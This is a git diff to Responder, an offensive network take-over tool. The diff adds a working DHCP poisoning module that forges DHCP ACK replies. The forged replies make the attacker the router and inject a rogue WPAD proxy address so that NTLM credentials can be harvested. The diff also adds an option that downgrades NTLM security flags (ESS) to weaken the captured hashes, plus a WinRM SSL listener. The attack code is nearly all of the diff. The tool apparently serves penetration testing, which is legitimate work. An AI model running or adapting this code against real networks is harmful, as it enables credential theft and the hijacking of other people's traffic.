diff --git a/Responder.py b/Responder.py
index 2b62977..9a82287 100755
--- a/Responder.py
+++ b/Responder.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
@@ -31,10 +31,9 @@ parser.add_option('-I','--interface',      action="store",      help="Network in
 parser.add_option('-i','--ip',             action="store",      help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
 
 parser.add_option('-e', "--externalip",    action="store",      help="Poison all requests with another IP address than Responder's one.", dest="ExternalIP",  metavar="10.0.0.22", default=None)
-
 parser.add_option('-b', '--basic',         action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False)
 parser.add_option('-r', '--wredir',        action="store_true", help="Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: False", dest="Wredirect", default=False)
-parser.add_option('-d', '--NBTNSdomain',   action="store_true", help="Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False", dest="NBTNSDomain", default=False)
+parser.add_option('-d', '--DHCP',          action="store_true", help="Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False", dest="DHCP_On_Off", default=False)
 parser.add_option('-f','--fingerprint',    action="store_true", help="This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", dest="Finger", default=False)
 parser.add_option('-w','--wpad',           action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False)
 parser.add_option('-u','--upstream-proxy', action="store",      help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None)
@@ -43,13 +42,14 @@ parser.add_option('-F','--ForceWpadAuth',  action="store_true", help="Force NTLM
 parser.add_option('-P','--ProxyAuth',       action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: False", dest="ProxyAuth_On_Off", default=False)
 
 parser.add_option('--lm',                  action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
+parser.add_option('--disable-ess',         action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False)
 parser.add_option('-v','--verbose',        action="store_true", help="Increase verbosity.", dest="Verbose")
 options, args = parser.parse_args()
 
 if not os.geteuid() == 0:
     print(color("[!] Responder must be run as root."))
     sys.exit(-1)
-elif options.OURIP is None and IsOsX() is True:
+elif options.OURIP == None and IsOsX() == True:
     print("\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n")
     parser.print_help()
     exit(-1)
@@ -61,9 +61,6 @@ StartupMessage()
 
 settings.Config.ExpandIPRanges()
 
-if settings.Config.AnalyzeMode:
-	print(color('[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1))
-
 #Create the DB, before we start Responder.
 CreateResponderDb()
 
@@ -266,6 +263,10 @@ def main():
 			from servers.WinRM import WinRM
 			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 5985, WinRM,)))
 
+		if settings.Config.WinRM_On_Off:
+			from servers.WinRM import WinRM
+			threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 5986, WinRM,)))
+
 		if settings.Config.SSL_On_Off:
 			from servers.HTTP import HTTP
 			threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 443, HTTP,)))
@@ -338,8 +339,16 @@ def main():
 			thread.setDaemon(True)
 			thread.start()
 
+
 		print(color('\n[+]', 2, 1) + " Listening for events...\n")
 
+		if settings.Config.AnalyzeMode:
+			print(color('[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1))
+
+		if settings.Config.DHCP_On_Off:
+			from poisoners.DHCP import DHCP
+			DHCP()
+
 		while True:
 			time.sleep(1)
 
diff --git a/packets.py b/packets.py
old mode 100644
new mode 100755
index 77036bd..e533cf6
--- a/packets.py
+++ b/packets.py
@@ -202,6 +202,9 @@ class MDNS_Ans(Packet):
 	def calculate(self):
 		self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"])
 
+################### DHCP SRV ######################
+
+
 ##### HTTP Packets #####
 class NTLM_Challenge(Packet):
 	fields = OrderedDict([
@@ -791,7 +794,7 @@ class LDAPNTLMChallenge(Packet):
 		("NTLMSSPNtWorkstationLen",                   "\x1e\x00"),
 		("NTLMSSPNtWorkstationMaxLen",                "\x1e\x00"),
 		("NTLMSSPNtWorkstationBuffOffset",            "\x38\x00\x00\x00"),
-		("NTLMSSPNtNegotiateFlags",                   "\x15\x82\x89\xe2"),
+		("NTLMSSPNtNegotiateFlags",                   "\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
 		("NTLMSSPNtServerChallenge",                  "\x81\x22\x33\x34\x55\x46\xe7\x88"),
 		("NTLMSSPNtReserved",                         "\x00\x00\x00\x00\x00\x00\x00\x00"),
 		("NTLMSSPNtTargetInfoLen",                    "\x94\x00"),
@@ -1197,7 +1200,7 @@ class SMBNegoAns(Packet):
 		("NegHintTag0ASNLen",         "\x17"),
 		("NegHintFinalASNId",         "\x1b"),
 		("NegHintFinalASNLen",        "\x15"),
-		("NegHintFinalASNStr",        settings.Config.MachineNego),
+		("NegHintFinalASNStr",        "not_defined_in_RFC4178@please_ignore"),
 	])
 
 	def calculate(self):
@@ -1331,7 +1334,7 @@ class SMBSession1Data(Packet):
 		("NTLMSSPNtWorkstationLen","\x1e\x00"),
 		("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
 		("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
-		("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
+		("NTLMSSPNtNegotiateFlags","\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
 		("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
 		("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
 		("NTLMSSPNtTargetInfoLen","\x94\x00"),
@@ -1576,7 +1579,7 @@ class SMB2NegoAns(Packet):
 		("NegHintTag0ASNLen",         "\x26"),
 		("NegHintFinalASNId",         "\x1b"), 
 		("NegHintFinalASNLen",        "\x24"),
-		("NegHintFinalASNStr",        settings.Config.MachineName+'@'+settings.Config.DomainName),
+		("NegHintFinalASNStr",        "not_defined_in_RFC4178@please_ignore"),
 	])
 
 	def calculate(self):
@@ -1651,7 +1654,7 @@ class SMB2Session1Data(Packet):
 		("NTLMSSPNtWorkstationLen","\x1e\x00"),
 		("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
 		("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
-		("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
+		("NTLMSSPNtNegotiateFlags","\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
 		("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
 		("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
 		("NTLMSSPNtTargetInfoLen","\x94\x00"),
@@ -2143,3 +2146,113 @@ class RPCNTLMNego(Packet):
 
 		self.fields["FragLen"] = StructWithLenPython2or3("<h",len(Data))
 
+################### Mailslot NETLOGON ######################
+class NBTUDPHeader(Packet):
+    fields = OrderedDict([
+        ("MessType",      "\x11"),
+        ("MoreFrag",      "\x02"),
+        ("TID",           "\x82\x92"),
+        ("SrcIP",         "0.0.0.0"),
+        ("SrcPort",       "\x00\x8a"), ##Always 138
+        ("DatagramLen",   "\x00\x00"),
+        ("PacketOffset",  "\x00\x00"),
+        ("ClientNBTName", ""),
+        ("DstNBTName",    ""),
+        ("Data", ""),
+    ])
+
+    def calculate(self):
+        self.fields["SrcIP"] = RespondWithIPAton()
+        ## DatagramLen.
+        DataGramLen = str(self.fields["PacketOffset"])+str(self.fields["ClientNBTName"])+str(self.fields["DstNBTName"])+str(self.fields["Data"])
+        self.fields["DatagramLen"] = StructWithLenPython2or3(">h",len(DataGramLen))
+
+class SMBTransMailslot(Packet):
+    fields = OrderedDict([
+        ("Wordcount",        "\x11"),
+        ("TotalParamCount",  "\x00\x00"),
+        ("TotalDataCount",   "\x00\x00"),
+        ("MaxParamCount",    "\x02\x00"),
+        ("MaxDataCount",     "\x00\x00"),
+        ("MaxSetupCount",    "\x00"),
+        ("Reserved",         "\x00"),
+        ("Flags",            "\x00\x00"),
+        ("Timeout",          "\xff\xff\xff\xff"),
+        ("Reserved2",        "\x00\x00"),
+        ("ParamCount",       "\x00\x00"),
+        ("ParamOffset",      "\x00\x00"),
+        ("DataCount",        "\x00\x00"),
+        ("DataOffset",       "\x00\x00"),
+        ("SetupCount",       "\x03"),
+        ("Reserved3",        "\x00"),
+        ("Opcode",           "\x01\x00"),
+        ("Priority",         "\x00\x00"),
+        ("Class",            "\x02\x00"),
+        ("Bcc",              "\x00\x00"),
+        ("MailSlot",         "\\MAILSLOT\\NET\\NETLOGON"),
+        ("MailSlotNull",     "\x00"),
+        ("Padding",          "\x00\x00\x00"),
+        ("Data",             ""),
+    ])
+
+    def calculate(self):
+        #Padding
+        if len(str(self.fields["Data"]))%2==0:
+           self.fields["Padding"] = "\x00\x00\x00\x00"
+        else:
+           self.fields["Padding"] = "\x00\x00\x00"
+        BccLen = str(self.fields["MailSlot"])+str(self.fields["MailSlotNull"])+str(self.fields["Padding"])+str(self.fields["Data"])
+        PacketOffsetLen = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved2"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved3"])+str(self.fields["Opcode"])+str(self.fields["Priority"])+str(self.fields["Class"])+str(self.fields["Bcc"])+str(self.fields["MailSlot"])+str(self.fields["MailSlotNull"])+str(self.fields["Padding"])
+
+        self.fields["DataCount"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
+        self.fields["TotalDataCount"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
+        self.fields["DataOffset"] = StructWithLenPython2or3("<h",len(PacketOffsetLen)+32)
+        self.fields["ParamOffset"] = StructWithLenPython2or3("<h",len(PacketOffsetLen)+32)
+        self.fields["Bcc"] = StructWithLenPython2or3("<h",len(BccLen))
+
+class SamLogonResponseEx(Packet):
+    fields = OrderedDict([
+        ("Cmd",               "\x17\x00"),
+        ("Sbz",               "\x00\x00"),
+        ("Flags",             "\xfd\x03\x00\x00"),
+        ("DomainGUID",        "\xe7\xfd\xf2\x4a\x4f\x98\x8b\x49\xbb\xd3\xcd\x34\xc7\xba\x57\x70"),
+        ("ForestName",        "\x04\x73\x6d\x62\x33\x05\x6c\x6f\x63\x61\x6c"),
+        ("ForestNameNull",    "\x00"),
+        ("ForestDomainName",  "\x04\x73\x6d\x62\x33\x05\x6c\x6f\x63\x61\x6c"),
+        ("ForestDomainNull",  "\x00"),
+        ("DNSName",           "\x0a\x73\x65\x72\x76\x65\x72\x32\x30\x30\x33"),
+        ("DNSPointer",        "\xc0\x18"),
+        ("DomainName",        "\x04\x53\x4d\x42\x33"),
+        ("DomainTerminator",  "\x00"),
+        ("ServerLen",         "\x0a"),
+        ("ServerName",        settings.Config.MachineName),
+        ("ServerTerminator",  "\x00"),
+        ("UsernameLen",       "\x10"),
+        ("Username",          "LGANDX"),
+        ("UserTerminator",    "\x00"),
+        ("SrvSiteNameLen",    "\x17"),
+        ("SrvSiteName",       "Default-First-Site-Name"),
+        ("SrvSiteNameNull",   "\x00"),
+        ("Pointer",           "\xc0"),
+        ("PointerOffset",     "\x5c"),
+        ("DCAddrSize",        "\x10"),
+        ("AddrType",          "\x02\x00"),
+        ("Port",              "\x00\x00"),
+        ("DCAddress",         "\xc0\xab\x01\x65"),
+        ("SinZero",           "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("Version",           "\x0d\x00\x00\x00"),
+        ("LmToken",           "\xff\xff"),
+        ("LmToken2",          "\xff\xff"),
+    ])
+
+    def calculate(self):
+        Offset = str(self.fields["Cmd"])+str(self.fields["Sbz"])+str(self.fields["Flags"])+str(self.fields["DomainGUID"])+str(self.fields["ForestName"])+str(self.fields["ForestNameNull"])+str(self.fields["ForestDomainName"])+str(self.fields["ForestDomainNull"])+str(self.fields["DNSName"])+str(self.fields["DNSPointer"])+str(self.fields["DomainName"])+str(self.fields["DomainTerminator"])+str(self.fields["ServerLen"])+str(self.fields["ServerName"])+str(self.fields["ServerTerminator"])+str(self.fields["UsernameLen"])+str(self.fields["Username"])+str(self.fields["UserTerminator"])
+
+        DcLen = str(self.fields["AddrType"])+str(self.fields["Port"])+str(self.fields["DCAddress"])+str(self.fields["SinZero"])
+        self.fields["DCAddress"] = RespondWithIPAton()
+        self.fields["ServerLen"] = StructWithLenPython2or3("<B",len(str(self.fields["ServerName"])))
+        self.fields["UsernameLen"] = StructWithLenPython2or3("<B",len(str(self.fields["Username"])))
+        self.fields["SrvSiteNameLen"] = StructWithLenPython2or3("<B",len(str(self.fields["SrvSiteName"])))
+        self.fields["DCAddrSize"] = StructWithLenPython2or3("<B",len(DcLen))
+        self.fields["PointerOffset"] = StructWithLenPython2or3("<B",len(Offset))
+
diff --git a/poisoners/DHCP.py b/poisoners/DHCP.py
new file mode 100755
index 0000000..2019a29
--- /dev/null
+++ b/poisoners/DHCP.py
@@ -0,0 +1,309 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sys
+if (sys.version_info < (3, 0)):
+   sys.exit('This script is meant to be run with Python3')
+
+import struct
+import optparse
+import configparser
+import os
+import codecs
+import netifaces
+import binascii
+
+BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
+sys.path.insert(0, BASEDIR)
+from odict import OrderedDict
+from utils import *
+
+def color(txt, code = 1, modifier = 0):
+    return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
+
+#Python version
+if (sys.version_info > (3, 0)):
+    PY2OR3     = "PY3"
+else:
+    PY2OR3  = "PY2"
+
+def StructWithLenPython2or3(endian,data):
+    #Python2...
+    if PY2OR3 == "PY2":
+        return struct.pack(endian, data)
+    #Python3...
+    else:
+        return struct.pack(endian, data).decode('latin-1')
+
+def NetworkSendBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return str(data.decode('latin-1'))
+
+class Packet():
+	fields = OrderedDict([
+		("data", ""),
+	])
+	def __init__(self, **kw):
+		self.fields = OrderedDict(self.__class__.fields)
+		for k,v in kw.items():
+			if callable(v):
+				self.fields[k] = v(self.fields[k])
+			else:
+				self.fields[k] = v
+	def __str__(self):
+		return "".join(map(str, self.fields.values()))
+
+config = configparser.ConfigParser()
+config.read(os.path.join(BASEDIR,'Responder.conf'))
+RespondTo           = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')] if _f]
+DontRespondTo       = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')] if _f]
+Interface           = settings.Config.Interface
+Responder_IP        = FindLocalIP(Interface, None)
+ROUTERIP            = Responder_IP # Set to Responder_IP in case we fall on a static IP network and we don't get a DHCP Offer. This var will be updated with the real dhcp IP if present.
+NETMASK             = "255.255.255.0"
+DNSIP               = "0.0.0.0"
+DNSIP2              = "0.0.0.0"
+DNSNAME             = "lan"
+WPADSRV             = "http://"+Responder_IP+"/wpad.dat"
+Respond_To_Requests = True
+DHCPClient          = []
+
+def GetMacAddress(Interface):
+	mac = netifaces.ifaddresses(Interface)[netifaces.AF_LINK][0]['addr']
+	return binascii.unhexlify(mac.replace(':', '')).decode('latin-1')
+
+##### IP Header #####
+class IPHead(Packet):
+    fields = OrderedDict([
+            ("Version",           "\x45"),
+            ("DiffServices",      "\x00"),
+            ("TotalLen",          "\x00\x00"),
+            ("Ident",             "\x00\x00"),
+            ("Flags",             "\x00\x00"),
+            ("TTL",               "\x40"),
+            ("Protocol",          "\x11"),
+            ("Checksum",          "\x00\x00"),
+            ("SrcIP",             ""),
+            ("DstIP",             ""),
+    ])
+
+class UDP(Packet):
+    fields = OrderedDict([
+            ("SrcPort",           "\x00\x43"),
+            ("DstPort",           "\x00\x44"),
+            ("Len",               "\x00\x00"),
+            ("Checksum",          "\x00\x00"),
+            ("Data",              "\x00\x00"),
+    ])
+
+    def calculate(self):
+        self.fields["Len"] = StructWithLenPython2or3(">h",len(str(self.fields["Data"]))+8)
+
+class DHCPDiscover(Packet):
+    fields = OrderedDict([
+            ("MessType",          "\x01"),
+            ("HdwType",           "\x01"),
+            ("HdwLen",            "\x06"),
+            ("Hops",              "\x00"),
+            ("Tid",               os.urandom(4).decode('latin-1')),
+            ("ElapsedSec",        "\x00\x01"),
+            ("BootpFlags",        "\x80\x00"),
+            ("ActualClientIP",    "\x00\x00\x00\x00"),
+            ("GiveClientIP",      "\x00\x00\x00\x00"),
+            ("NextServerIP",      "\x00\x00\x00\x00"),
+            ("RelayAgentIP",      "\x00\x00\x00\x00"),
+            ("ClientMac",         os.urandom(6).decode('latin-1')),#Needs to be random.
+            ("ClientMacPadding",  "\x00" *10),
+            ("ServerHostname",    "\x00" * 64),
+            ("BootFileName",      "\x00" * 128),
+            ("MagicCookie",       "\x63\x82\x53\x63"),
+            ("DHCPCode",          "\x35"),              #DHCP Message
+            ("DHCPCodeLen",       "\x01"),
+            ("DHCPOpCode",        "\x01"),              #Msgtype(Discover)
+            ("Op55",              "\x37"),
+            ("Op55Len",           "\x0b"),
+            ("Op55Str",           "\x01\x03\x0c\x0f\x06\x1a\x21\x79\x77\x2a\x78"),#Requested info.
+            ("Op12",              "\x0c"),
+            ("Op12Len",           "\x09"),
+            ("Op12Str",           settings.Config.DHCPHostname),#random str.
+            ("Op255",             "\xff"),
+            ("Padding",           "\x00"),
+    ])
+
+    def calculate(self):
+        self.fields["ClientMac"] = GetMacAddress(Interface)
+
+class DHCPACK(Packet):
+    fields = OrderedDict([
+            ("MessType",          "\x02"),
+            ("HdwType",           "\x01"),
+            ("HdwLen",            "\x06"),
+            ("Hops",              "\x00"),
+            ("Tid",               "\x11\x22\x33\x44"),
+            ("ElapsedSec",        "\x00\x00"),
+            ("BootpFlags",        "\x00\x00"),
+            ("ActualClientIP",    "\x00\x00\x00\x00"),
+            ("GiveClientIP",      "\x00\x00\x00\x00"),
+            ("NextServerIP",      "\x00\x00\x00\x00"),
+            ("RelayAgentIP",      "\x00\x00\x00\x00"),
+            ("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
+            ("ClientMacPadding",  "\x00" *10),
+            ("ServerHostname",    "\x00" * 64),
+            ("BootFileName",      "\x00" * 128),
+            ("MagicCookie",       "\x63\x82\x53\x63"),
+            ("DHCPCode",          "\x35"),              #DHCP Message
+            ("DHCPCodeLen",       "\x01"),
+            ("DHCPOpCode",        "\x05"),              #Msgtype(ACK)
+            ("Op54",              "\x36"),
+            ("Op54Len",           "\x04"),
+            ("Op54Str",           ""),                  #DHCP Server
+            ("Op51",              "\x33"),
+            ("Op51Len",           "\x04"),
+            ("Op51Str",           "\x00\x00\x00\x0a"),  #Lease time
+            ("Op1",               "\x01"),
+            ("Op1Len",            "\x04"),
+            ("Op1Str",            ""),                  #Netmask
+            ("Op15",              "\x0f"),
+            ("Op15Len",           "\x0e"),
+            ("Op15Str",           ""),                  #DNS Name
+            ("Op3",               "\x03"),
+            ("Op3Len",            "\x04"),
+            ("Op3Str",            ""),                  #Router
+            ("Op6",               "\x06"),
+            ("Op6Len",            "\x08"),
+            ("Op6Str",            ""),                  #DNS Servers
+            ("Op252",             "\xfc"),
+            ("Op252Len",          "\x04"),
+            ("Op252Str",          ""),                  #Wpad Server
+            ("Op255",             "\xff"),
+            ("Padding",           "\x00"),
+    ])
+
+    def calculate(self):
+        self.fields["Op54Str"]  = socket.inet_aton(ROUTERIP).decode('latin-1')
+        self.fields["Op1Str"]   = socket.inet_aton(NETMASK).decode('latin-1')
+        self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP).decode('latin-1')
+        self.fields["Op6Str"]   = socket.inet_aton(DNSIP).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
+        self.fields["Op15Str"]  = DNSNAME
+        self.fields["Op252Str"] = WPADSRV
+        self.fields["Op15Len"]  = StructWithLenPython2or3(">b",len(str(self.fields["Op15Str"])))
+        self.fields["Op252Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op252Str"])))
+
+def RespondToThisIP(ClientIp):
+    if ClientIp.startswith('127.0.0.'):
+        return False
+    elif RespondTo and ClientIp not in RespondTo:
+        return False
+    elif ClientIp in RespondTo or RespondTo == []:
+        if ClientIp not in DontRespondTo:
+            return True
+    return False
+
+def ParseSrcDSTAddr(data):
+    SrcIP = socket.inet_ntoa(data[0][26:30])
+    DstIP = socket.inet_ntoa(data[0][30:34])
+    SrcPort = struct.unpack('>H',data[0][34:36])[0]
+    DstPort = struct.unpack('>H',data[0][36:38])[0]
+    return SrcIP, SrcPort, DstIP, DstPort
+
+def FindIP(data):
+    data = data.decode('latin-1')
+    IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data))
+    return ''.join(IP[0:4]).encode('latin-1')
+
+def ParseDHCPCode(data, ClientIP):
+    global DHCPClient
+    global ROUTERIP
+    PTid        = data[4:8]
+    Seconds     = data[8:10]
+    CurrentIP   = socket.inet_ntoa(data[12:16])
+    RequestedIP = socket.inet_ntoa(data[16:20])
+    MacAddr     = data[28:34]
+    MacAddrStr  = ':'.join('%02x' % ord(m) for m in MacAddr.decode('latin-1')).upper()
+    OpCode      = data[242:243]
+    RequestIP   = data[245:249]
+    
+    if DHCPClient.count(MacAddrStr) >= 4:
+    	return "'%s' has been poisoned more than 4 times. Ignoring..." % MacAddrStr
+    	
+    if OpCode == b"\x02" and Respond_To_Requests:  # DHCP Offer
+        ROUTERIP = ClientIP
+        return 'Found DHCP server IP: %s, now waiting for incoming requests...' % (ROUTERIP)
+
+    elif OpCode == b"\x03" and Respond_To_Requests:  # DHCP Request
+        IP = FindIP(data)
+        if IP:
+            IPConv = socket.inet_ntoa(IP)
+            if RespondToThisIP(IPConv):
+                IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1'))
+                Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), ElapsedSec=Seconds.decode('latin-1'))
+                Packet.calculate()
+                Buffer = UDP(Data = Packet)
+                Buffer.calculate()
+                SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
+                DHCPClient.append(MacAddrStr)
+                return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr)
+
+    elif OpCode == b"\x01" and Respond_To_Requests:  # DHCP Discover
+        IP = FindIP(data)
+        if IP:
+            IPConv = socket.inet_ntoa(IP)
+            if RespondToThisIP(IPConv):
+                IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1'))
+                Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), DHCPOpCode="\x02", ElapsedSec=Seconds.decode('latin-1'))
+                Packet.calculate()
+                Buffer = UDP(Data = Packet)
+                Buffer.calculate()
+                SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
+                DHCPClient.append(MacAddrStr)
+                return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr)
+
+def SendDiscover():
+	s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
+	s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+	IP_Header = IPHead(SrcIP = socket.inet_aton('0.0.0.0').decode('latin-1'), DstIP=socket.inet_aton('255.255.255.255').decode('latin-1'))
+	Packet = DHCPDiscover()
+	Packet.calculate()
+	Buffer = UDP(SrcPort="\x00\x44", DstPort="\x00\x43",Data = Packet)
+	Buffer.calculate()
+	s.sendto(NetworkSendBufferPython2or3(str(IP_Header)+str(Buffer)), ('255.255.255.255', 67))
+
+def SendDHCP(packet,Host):
+	s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
+	s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+	s.sendto(NetworkSendBufferPython2or3(packet), Host)
+
+def DHCP():
+    s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
+    s.bind((Interface, 0x0800))
+    SendDiscover()
+    while True:
+            data = s.recvfrom(65535)
+            if data[0][23:24] == b"\x11":# is udp?
+                SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
+                if SrcPort == 67 or DstPort == 67:
+                    ClientIP = socket.inet_ntoa(data[0][26:30])
+                    ret = ParseDHCPCode(data[0][42:], ClientIP)
+                    if ret:
+                        print(text("[*] [DHCP] %s" % ret))
diff --git a/settings.py b/settings.py
old mode 100644
new mode 100755
index b96f127..b728242
--- a/settings.py
+++ b/settings.py
@@ -23,7 +23,7 @@ import subprocess
 
 from utils import *
 
-__version__ = 'Responder 3.0.6.0'
+__version__ = 'Responder 3.0.7.0'
 
 class Settings:
 	
@@ -68,7 +68,7 @@ class Settings:
 
 	def populate(self, options):
 
-		if options.Interface is None and utils.IsOsX() is False:
+		if options.Interface == None and utils.IsOsX() == False:
 			print(utils.color("Error: -I <if> mandatory option is missing", 1))
 			sys.exit(-1)
 
@@ -144,7 +144,7 @@ class Settings:
 		self.WPAD_Script      = config.get('HTTP Server', 'WPADScript')
 		self.HtmlToInject     = config.get('HTTP Server', 'HtmlToInject')
 
-		if self.Serve_Exe is True:	
+		if self.Serve_Exe == True:	
 			if not os.path.exists(self.Html_Filename):
 				print(utils.color("/!\ Warning: %s: file not found" % self.Html_Filename, 3, 1))
 
@@ -164,6 +164,7 @@ class Settings:
 		#Generate Random stuff for one Responder session
 		self.MachineName       = 'WIN-'+''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(11)])
 		self.Domain            = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(4)])
+		self.DHCPHostname      = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)])
 		self.DomainName        = self.Domain + '.LOCAL'
 		self.MachineNego       = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)]) +'$@'+self.DomainName
 		self.RPCPort           = random.randrange(45000, 49999)
@@ -176,9 +177,10 @@ class Settings:
 		# CLI options
 		self.ExternalIP         = options.ExternalIP
 		self.LM_On_Off          = options.LM_On_Off
+		self.NOESS_On_Off       = options.NOESS_On_Off
 		self.WPAD_On_Off        = options.WPAD_On_Off
 		self.Wredirect          = options.Wredirect
-		self.NBTNSDomain        = options.NBTNSDomain
+		self.DHCP_On_Off        = options.DHCP_On_Off
 		self.Basic              = options.Basic
 		self.Finger_On_Off      = options.Finger
 		self.Interface          = options.Interface
@@ -193,7 +195,7 @@ class Settings:
 		if self.ExternalIP:
 			self.ExternalIPAton = socket.inet_aton(self.ExternalIP)
 
-		if self.HtmlToInject is None:
+		if self.HtmlToInject == None:
 			self.HtmlToInject = ''
 
 		self.Bind_To         = utils.FindLocalIP(self.Interface, self.OURIP)
diff --git a/utils.py b/utils.py
old mode 100644
new mode 100755
index 7a71c83..11feda0
--- a/utils.py
+++ b/utils.py
@@ -369,6 +369,7 @@ def StartupMessage():
 	print('    %-27s' % "LLMNR" + enabled)
 	print('    %-27s' % "NBT-NS" + enabled)
 	print('    %-27s' % "DNS/MDNS" + enabled)
+	print('    %-27s' % "DHCP" + (enabled if settings.Config.DHCP_On_Off else disabled))
 	print('')
 
 	print(color("[+] ", 2, 1) + "Servers:")
@@ -403,6 +404,7 @@ def StartupMessage():
 	print('    %-27s' % "Force WPAD auth" + (enabled if settings.Config.Force_WPAD_Auth else disabled))
 	print('    %-27s' % "Force Basic Auth" + (enabled if settings.Config.Basic else disabled))
 	print('    %-27s' % "Force LM downgrade" + (enabled if settings.Config.LM_On_Off == True else disabled))
+	print('    %-27s' % "Force ESS downgrade" + (enabled if settings.Config.NOESS_On_Off == True or settings.Config.LM_On_Off == True else disabled))
